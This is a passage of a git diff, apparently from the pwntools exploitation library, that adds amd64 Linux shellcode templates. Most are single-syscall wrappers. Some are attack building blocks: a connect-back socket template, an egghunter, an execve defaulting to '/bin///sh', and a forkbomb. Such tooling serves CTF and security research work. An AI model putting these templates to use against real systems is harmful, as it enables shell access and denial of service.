b/pwnlib/shellcraft/templates/amd64/linux/brk.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr"/> +<%docstring> +Invokes the syscall brk. See 'man 2 brk' for more information. + +Arguments: + addr(void): addr + + + ${syscall('SYS_brk', addr)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/chdir.asm b/pwnlib/shellcraft/templates/amd64/linux/chdir.asm new file mode 100644 index 000000000..34d709077 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/chdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chdir. See 'man 2 chdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chdir', path)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/chmod.asm b/pwnlib/shellcraft/templates/amd64/linux/chmod.asm new file mode 100644 index 000000000..bc186ce01 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/chmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall chmod. See 'man 2 chmod' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_chmod', file, mode)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/chown.asm b/pwnlib/shellcraft/templates/amd64/linux/chown.asm new file mode 100644 index 000000000..ce9906a5a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/chown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall chown. See 'man 2 chown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_chown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/chroot.asm b/pwnlib/shellcraft/templates/amd64/linux/chroot.asm new file mode 100644 index 000000000..ede746bb7 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/chroot.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chroot. See 'man 2 chroot' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chroot', path)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/clock_getres.asm b/pwnlib/shellcraft/templates/amd64/linux/clock_getres.asm new file mode 100644 index 000000000..35e2dc07c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/clock_getres.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="clock_id, res"/> +<%docstring> +Invokes the syscall clock_getres. See 'man 2 clock_getres' for more information. + +Arguments: + clock_id(clockid_t): clock_id + res(timespec): res + + + ${syscall('SYS_clock_getres', clock_id, res)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/clock_gettime.asm b/pwnlib/shellcraft/templates/amd64/linux/clock_gettime.asm new file mode 100644 index 000000000..2e7a3e3f9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/clock_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_gettime. See 'man 2 clock_gettime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_gettime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/clock_nanosleep.asm b/pwnlib/shellcraft/templates/amd64/linux/clock_nanosleep.asm new file mode 100644 index 000000000..b7538fff5 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/clock_nanosleep.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="clock_id, flags, req, rem"/> +<%docstring> +Invokes the syscall clock_nanosleep. See 'man 2 clock_nanosleep' for more information. + +Arguments: + clock_id(clockid_t): clock_id + flags(int): flags + req(timespec): req + rem(timespec): rem + + + ${syscall('SYS_clock_nanosleep', clock_id, flags, req, rem)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/clock_settime.asm b/pwnlib/shellcraft/templates/amd64/linux/clock_settime.asm new file mode 100644 index 000000000..6aad6ac54 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/clock_settime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_settime. See 'man 2 clock_settime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_settime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/clone.asm b/pwnlib/shellcraft/templates/amd64/linux/clone.asm new file mode 100644 index 000000000..a578200a9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/clone.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fn, child_stack, flags, arg, vararg"/> +<%docstring> +Invokes the syscall clone. See 'man 2 clone' for more information. + +Arguments: + fn(int): fn + child_stack(void): child_stack + flags(int): flags + arg(void): arg + vararg(int): vararg + + + ${syscall('SYS_clone', fn, child_stack, flags, arg, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/close.asm b/pwnlib/shellcraft/templates/amd64/linux/close.asm new file mode 100644 index 000000000..50358cf79 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/close.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall close. See 'man 2 close' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_close', fd)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/connect.asm b/pwnlib/shellcraft/templates/amd64/linux/connect.asm index d69d9bfb0..b5843acef 100644 --- a/pwnlib/shellcraft/templates/amd64/linux/connect.asm +++ b/pwnlib/shellcraft/templates/amd64/linux/connect.asm @@ -1,5 +1,8 @@ -<% from pwnlib.shellcraft import amd64 %> -<% from pwnlib.util.net import sockaddr %> +<% +from pwnlib.shellcraft.amd64 import pushstr +from pwnlib.shellcraft.amd64.linux import socket, syscall +from pwnlib.util.net import sockaddr +%> <%page args="host, port, network = 'ipv4'"/> <%docstring> @@ -11,13 +14,13 @@ sockaddr, addr_len, address_family = sockaddr(host, port, network) %>\ /* open new socket */ - ${amd64.linux.syscall('SYS_socket', address_family, 'SOCK_STREAM', 0)} - + ${socket(network)} + /* Put socket into rbp */ mov rbp, rax - + /* Create address structure on stack */ - ${amd64.pushstr(sockaddr, False)} - + ${pushstr(sockaddr, False)} + /* Connect the socket */ - ${amd64.linux.syscall('SYS_connect', 'rbp', 'rsp', addr_len)} + ${syscall('SYS_connect', 'rbp', 'rsp', addr_len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/creat.asm b/pwnlib/shellcraft/templates/amd64/linux/creat.asm new file mode 100644 index 000000000..c8846170c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/creat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall creat. See 'man 2 creat' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_creat', file, mode)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/dup2.asm b/pwnlib/shellcraft/templates/amd64/linux/dup2.asm new file mode 100644 index 000000000..932b8d76e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/dup2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, fd2"/> +<%docstring> +Invokes the syscall dup2. See 'man 2 dup2' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + + + ${syscall('SYS_dup2', fd, fd2)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/dup3.asm b/pwnlib/shellcraft/templates/amd64/linux/dup3.asm new file mode 100644 index 000000000..0b96aeb4e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/dup3.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, fd2, flags"/> +<%docstring> +Invokes the syscall dup3. See 'man 2 dup3' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + flags(int): flags + + + ${syscall('SYS_dup3', fd, fd2, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/echo.asm b/pwnlib/shellcraft/templates/amd64/linux/echo.asm index ac8ab0ac6..7ebddd573 100644 --- a/pwnlib/shellcraft/templates/amd64/linux/echo.asm +++ b/pwnlib/shellcraft/templates/amd64/linux/echo.asm @@ -1,5 +1,5 @@ <% from pwnlib.shellcraft import amd64 %> -<%page args="string, sock = 'rbp'"/> +<%page args="string, sock = '1'"/> <%docstring>Writes a string to a file descriptor ${amd64.pushstr(string, append_null = False)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/egghunter.asm b/pwnlib/shellcraft/templates/amd64/linux/egghunter.asm new file mode 100644 index 000000000..ccb0011af --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/egghunter.asm @@ -0,0 +1,73 @@ +<% +from pwnlib.shellcraft import amd64, pretty, common +from pwnlib.util.packing import pack, unpack +from pwnlib.util.lists import group +from pwnlib import constants, log +%> +<%page args="egg, start_address = 0x7efc00000000, stride = 0x10000"/> +<%docstring> +egghunter(egg, start_address = 0) + +Searches memory for the byte sequence 'egg'. + +Return value is the address immediately following the match, +stored in RDI. + +Arguments: + egg(str, int): String of bytes, or word-size integer to search for + start_address(int): Where to start the search + +<% +egghunter_loop = common.label('egghunter_loop') +memcmp = common.label('egghunter_memcmp') +done = common.label('egghunter_done') +next_page = common.label('egghunter_nextpage') + +egg_str = egg +if isinstance(egg, int): + egg_str = pack(egg, bytes=4) + +if len(egg_str) % 4: + log = log.getLogger('pwnlib.shellcraft.templates.amd64.linux.egghunter') + log.error("Egg size must be a multiple of four bytes") +%> + cld + ${amd64.pushstr(egg_str, False)} +% if start_address: + ${amd64.mov('rbx', start_address)} +% endif + +## Search for pages +${egghunter_loop}: + ${amd64.linux.access('rbx', 0)} + +## EFAULT == Bad address + cmp al, (-${pretty(constants.EFAULT)}) & 0xff + jz ${next_page} + +## We found a page, scan all of the DWORDs + ${amd64.mov('rdx', 0x1000/4)} +${memcmp}: + test rdx, rdx + jz ${next_page} + +## Scan forward by DWORD + ${amd64.setregs({'rsi':'rsp', + 'rdi':'rbx', + 'rcx': len(egg_str)/4})} +## Success? + repe cmpsd + jz ${done} + +## Increment the starting point, decement the counter, restart + add rbx, 4 + dec rdx + jnz ${memcmp} + +${next_page}: +## Next page + or bx, 0xfff + inc rbx + jmp ${egghunter_loop} +${done}: + diff --git a/pwnlib/shellcraft/templates/amd64/linux/epoll_create.asm b/pwnlib/shellcraft/templates/amd64/linux/epoll_create.asm new file mode 100644 index 000000000..9d49f65ec --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/epoll_create.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="size"/> +<%docstring> +Invokes the syscall epoll_create. See 'man 2 epoll_create' for more information. + +Arguments: + size(int): size + + + ${syscall('SYS_epoll_create', size)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/epoll_create1.asm b/pwnlib/shellcraft/templates/amd64/linux/epoll_create1.asm new file mode 100644 index 000000000..04b8deb4e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/epoll_create1.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall epoll_create1. See 'man 2 epoll_create1' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_epoll_create1', flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/epoll_ctl.asm b/pwnlib/shellcraft/templates/amd64/linux/epoll_ctl.asm new file mode 100644 index 000000000..b20cedcf0 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/epoll_ctl.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="epfd, op, fd, event"/> +<%docstring> +Invokes the syscall epoll_ctl. See 'man 2 epoll_ctl' for more information. + +Arguments: + epfd(int): epfd + op(int): op + fd(int): fd + event(epoll_event): event + + + ${syscall('SYS_epoll_ctl', epfd, op, fd, event)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/epoll_pwait.asm b/pwnlib/shellcraft/templates/amd64/linux/epoll_pwait.asm new file mode 100644 index 000000000..81647062d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/epoll_pwait.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout, ss"/> +<%docstring> +Invokes the syscall epoll_pwait. See 'man 2 epoll_pwait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + ss(sigset_t): ss + + + ${syscall('SYS_epoll_pwait', epfd, events, maxevents, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/epoll_wait.asm b/pwnlib/shellcraft/templates/amd64/linux/epoll_wait.asm new file mode 100644 index 000000000..d6713c8fa --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/epoll_wait.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout"/> +<%docstring> +Invokes the syscall epoll_wait. See 'man 2 epoll_wait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + + + ${syscall('SYS_epoll_wait', epfd, events, maxevents, timeout)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/execve.asm b/pwnlib/shellcraft/templates/amd64/linux/execve.asm new file mode 100644 index 000000000..a479bdab9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/execve.asm @@ -0,0 +1,51 @@ +<% + from pwnlib.shellcraft import amd64, registers + from pwnlib.abi import linux_amd64_syscall as abi +%> +<%docstring> +Execute a different process. + +Attempts to perform some automatic detection of types. +Otherwise, the arguments behave as normal. + +- If ``path`` is a string that is not a known register, + it is pushed onto the stack. +- If ``argv`` is an array of strings, it is pushed onto + the stack, and NULL-terminated. +- If ``envp`` is an dictionary of {string:string}, + it is pushed onto the stack, and NULL-terminated. + +Example: + + >>> path = '/bin/sh' + >>> argv = ['sh', '-c', 'echo Hello, $NAME; exit $STATUS'] + >>> envp = {'NAME': 'zerocool', 'STATUS': 3} + >>> sc = shellcraft.amd64.linux.execve(path, argv, envp) + >>> io = run_assembly(sc) + >>> io.recvall() + 'Hello, zerocool\n' + >>> io.poll(True) + 3 + +<%page args="path = '/bin///sh', argv=[], envp={}"/> +<% +if isinstance(envp, dict): + envp = ['%s=%s' % (k,v) for (k,v) in envp.items()] + +args_reg = abi.register_arguments[2] +env_reg = abi.register_arguments[3] +%> +% if isinstance(argv, (list, tuple)): + ${amd64.pushstr_array(abi.register_arguments[3], argv)} + <% argv = abi.register_arguments[3] %> +% endif +% if isinstance(envp, (list, tuple)): + ${amd64.pushstr_array(abi.register_arguments[2], envp)} + <% envp = abi.register_arguments[2] %> +% endif +% if isinstance(path, str) and not registers.is_register(path): + ${amd64.pushstr(path)} + <% path = 'rsp' %> +%endif + ${amd64.syscall('SYS_execve', path, argv, envp)} + diff --git a/pwnlib/shellcraft/templates/amd64/linux/faccessat.asm b/pwnlib/shellcraft/templates/amd64/linux/faccessat.asm new file mode 100644 index 000000000..50a33aac1 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/faccessat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, file, type, flag"/> +<%docstring> +Invokes the syscall faccessat. See 'man 2 faccessat' for more information. + +Arguments: + fd(int): fd + file(char): file + type(int): type + flag(int): flag + + + ${syscall('SYS_faccessat', fd, file, type, flag)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fallocate.asm b/pwnlib/shellcraft/templates/amd64/linux/fallocate.asm new file mode 100644 index 000000000..bcd110fa5 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fallocate.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, mode, offset, len"/> +<%docstring> +Invokes the syscall fallocate. See 'man 2 fallocate' for more information. + +Arguments: + fd(int): fd + mode(int): mode + offset(off_t): offset + len(off_t): len + + + ${syscall('SYS_fallocate', fd, mode, offset, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fchdir.asm b/pwnlib/shellcraft/templates/amd64/linux/fchdir.asm new file mode 100644 index 000000000..85df7f8e2 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fchdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fchdir. See 'man 2 fchdir' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fchdir', fd)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fchmod.asm b/pwnlib/shellcraft/templates/amd64/linux/fchmod.asm new file mode 100644 index 000000000..49c115279 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fchmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, mode"/> +<%docstring> +Invokes the syscall fchmod. See 'man 2 fchmod' for more information. + +Arguments: + fd(int): fd + mode(mode_t): mode + + + ${syscall('SYS_fchmod', fd, mode)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fchmodat.asm b/pwnlib/shellcraft/templates/amd64/linux/fchmodat.asm new file mode 100644 index 000000000..2ee014875 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fchmodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, file, mode, flag"/> +<%docstring> +Invokes the syscall fchmodat. See 'man 2 fchmodat' for more information. + +Arguments: + fd(int): fd + file(char): file + mode(mode_t): mode + flag(int): flag + + + ${syscall('SYS_fchmodat', fd, file, mode, flag)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fchown.asm b/pwnlib/shellcraft/templates/amd64/linux/fchown.asm new file mode 100644 index 000000000..4ece2907c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, owner, group"/> +<%docstring> +Invokes the syscall fchown. See 'man 2 fchown' for more information. + +Arguments: + fd(int): fd + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_fchown', fd, owner, group)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fchownat.asm b/pwnlib/shellcraft/templates/amd64/linux/fchownat.asm new file mode 100644 index 000000000..40230d55b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fchownat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, file, owner, group, flag"/> +<%docstring> +Invokes the syscall fchownat. See 'man 2 fchownat' for more information. + +Arguments: + fd(int): fd + file(char): file + owner(uid_t): owner + group(gid_t): group + flag(int): flag + + + ${syscall('SYS_fchownat', fd, file, owner, group, flag)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fcntl.asm b/pwnlib/shellcraft/templates/amd64/linux/fcntl.asm new file mode 100644 index 000000000..62e98b487 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fcntl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, cmd, vararg"/> +<%docstring> +Invokes the syscall fcntl. See 'man 2 fcntl' for more information. + +Arguments: + fd(int): fd + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_fcntl', fd, cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fdatasync.asm b/pwnlib/shellcraft/templates/amd64/linux/fdatasync.asm new file mode 100644 index 000000000..e8ae6eac6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fdatasync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fildes"/> +<%docstring> +Invokes the syscall fdatasync. See 'man 2 fdatasync' for more information. + +Arguments: + fildes(int): fildes + + + ${syscall('SYS_fdatasync', fildes)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/flock.asm b/pwnlib/shellcraft/templates/amd64/linux/flock.asm new file mode 100644 index 000000000..56a415024 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/flock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, operation"/> +<%docstring> +Invokes the syscall flock. See 'man 2 flock' for more information. + +Arguments: + fd(int): fd + operation(int): operation + + + ${syscall('SYS_flock', fd, operation)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fork.asm b/pwnlib/shellcraft/templates/amd64/linux/fork.asm new file mode 100644 index 000000000..1af6a658b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall fork. See 'man 2 fork' for more information. + +Arguments: + + + + ${syscall('SYS_fork')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/forkbomb.asm b/pwnlib/shellcraft/templates/amd64/linux/forkbomb.asm new file mode 100644 index 000000000..06d4f2f5f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/forkbomb.asm @@ -0,0 +1,13 @@ +<% + from pwnlib.shellcraft.amd64.linux import fork + from pwnlib.shellcraft.common import label +%> +<%docstring> +Performs a forkbomb attack. + +<% + dosloop = label('fork_bomb') +%> +${dosloop}: + ${fork()} + jmp ${dosloop} diff --git a/pwnlib/shellcraft/templates/amd64/linux/forkexit.asm b/pwnlib/shellcraft/templates/amd64/linux/forkexit.asm new file mode 100644 index 000000000..5ea2d3be3 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/forkexit.asm @@ -0,0 +1,16 @@ +<% + from pwnlib.shellcraft import common + from pwnlib.shellcraft.amd64.linux import fork, exit +%> +<%page args=""/> +<%docstring> +Attempts to fork. If the fork is successful, the parent exits. + +<% +dont_exit = common.label('forkexit') +%> + ${fork()} + cmp rax, 1 + jl ${dont_exit} + ${exit(0)} +${dont_exit}: diff --git a/pwnlib/shellcraft/templates/amd64/linux/fstat.asm b/pwnlib/shellcraft/templates/amd64/linux/fstat.asm new file mode 100644 index 000000000..2e2736eb0 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat. See 'man 2 fstat' for more information. + +Arguments: + fd(int): fd + buf(stat): buf + + + ${syscall('SYS_fstat', fd, buf)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fstat64.asm b/pwnlib/shellcraft/templates/amd64/linux/fstat64.asm new file mode 100644 index 000000000..08fdf990e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat64. See 'man 2 fstat64' for more information. + +Arguments: + fd(int): fd + buf(stat64): buf + + + ${syscall('SYS_fstat64', fd, buf)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fstatat64.asm b/pwnlib/shellcraft/templates/amd64/linux/fstatat64.asm new file mode 100644 index 000000000..b20758760 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fstatat64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, file, buf, flag"/> +<%docstring> +Invokes the syscall fstatat64. See 'man 2 fstatat64' for more information. + +Arguments: + fd(int): fd + file(char): file + buf(stat64): buf + flag(int): flag + + + ${syscall('SYS_fstatat64', fd, file, buf, flag)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fsync.asm b/pwnlib/shellcraft/templates/amd64/linux/fsync.asm new file mode 100644 index 000000000..4d1bc776d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fsync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fsync. See 'man 2 fsync' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fsync', fd)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ftruncate.asm b/pwnlib/shellcraft/templates/amd64/linux/ftruncate.asm new file mode 100644 index 000000000..89c87833f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ftruncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate. See 'man 2 ftruncate' for more information. + +Arguments: + fd(int): fd + length(off_t): length + + + ${syscall('SYS_ftruncate', fd, length)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ftruncate64.asm b/pwnlib/shellcraft/templates/amd64/linux/ftruncate64.asm new file mode 100644 index 000000000..4192a1707 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ftruncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate64. See 'man 2 ftruncate64' for more information. + +Arguments: + fd(int): fd + length(off64_t): length + + + ${syscall('SYS_ftruncate64', fd, length)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/futimesat.asm b/pwnlib/shellcraft/templates/amd64/linux/futimesat.asm new file mode 100644 index 000000000..62af5f0b3 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/futimesat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, file, tvp"/> +<%docstring> +Invokes the syscall futimesat. See 'man 2 futimesat' for more information. + +Arguments: + fd(int): fd + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_futimesat', fd, file, tvp)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getcwd.asm b/pwnlib/shellcraft/templates/amd64/linux/getcwd.asm new file mode 100644 index 000000000..f67a43a51 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getcwd.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="buf, size"/> +<%docstring> +Invokes the syscall getcwd. See 'man 2 getcwd' for more information. + +Arguments: + buf(char): buf + size(size_t): size + + + ${syscall('SYS_getcwd', buf, size)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getegid.asm b/pwnlib/shellcraft/templates/amd64/linux/getegid.asm new file mode 100644 index 000000000..ce0a6c787 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getegid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getegid. See 'man 2 getegid' for more information. + +Arguments: + + + + ${syscall('SYS_getegid')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/geteuid.asm b/pwnlib/shellcraft/templates/amd64/linux/geteuid.asm new file mode 100644 index 000000000..1cb726ae9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/geteuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall geteuid. See 'man 2 geteuid' for more information. + +Arguments: + + + + ${syscall('SYS_geteuid')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getgid.asm b/pwnlib/shellcraft/templates/amd64/linux/getgid.asm new file mode 100644 index 000000000..3ae8ca424 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getgid. See 'man 2 getgid' for more information. + +Arguments: + + + + ${syscall('SYS_getgid')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getgroups.asm b/pwnlib/shellcraft/templates/amd64/linux/getgroups.asm new file mode 100644 index 000000000..925132549 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="size, list"/> +<%docstring> +Invokes the syscall getgroups. See 'man 2 getgroups' for more information. + +Arguments: + size(int): size + list(gid_t): list + + + ${syscall('SYS_getgroups', size, list)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getitimer.asm b/pwnlib/shellcraft/templates/amd64/linux/getitimer.asm new file mode 100644 index 000000000..bbd067d6b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getitimer.asm @@ -0,0 +1,14 @@ + +<% + from 